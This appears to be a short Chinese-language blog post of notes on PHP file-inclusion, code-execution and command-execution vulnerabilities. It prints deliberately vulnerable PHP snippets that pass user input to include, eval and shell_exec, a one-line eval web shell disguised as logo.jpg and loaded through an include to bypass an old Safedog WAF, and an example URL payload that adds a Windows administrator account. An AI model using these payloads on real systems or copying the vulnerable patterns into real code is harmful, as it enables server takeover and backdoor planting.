Php 漏洞代码

Posted 2020-08-02

php包含漏洞      易裤cms包含漏洞  
<?
$i = $_GET[‘t‘];
include($i);
//http://127.0.0.1/include/include.php?t=test.txt
//$i=test.txt

?>

 

结论：文件包含意味着以php脚本格式去执行包含的文件

远程包含，本地包含原因：

1.php.ini中allow_url_include设置开启则可存在远程包含

 

2.Php编程中包含函数的选用.

 

低版本安全狗后门绕过采用的文件包含漏洞

 

上传两个文件

 

1.logo.jpg 代码 <?php eval($_POST[‘pass’]);?>

 

2.Xx.php  代码 <?php include(“logo.jpg”)?>

 

 

代码执行漏洞 
 thinkphp代码执行漏洞
跟菜刀原理差不多

eval assert相关函数

 

<?php
$id = $_GET[‘x‘];
eval("$id");

 

?>

http://192.168.0.111/phpexp/eval.php?x=exec("net localgroup  administrators test /add");

 

 

命令执行

exec，shell_exec，system等函数引起的漏洞

程序员在开发cms网站时，函数后存在可控变量，会导致命令执行漏洞

<?php
$cmd = $_GET[‘x‘];
echo shell_exec($cmd);
?>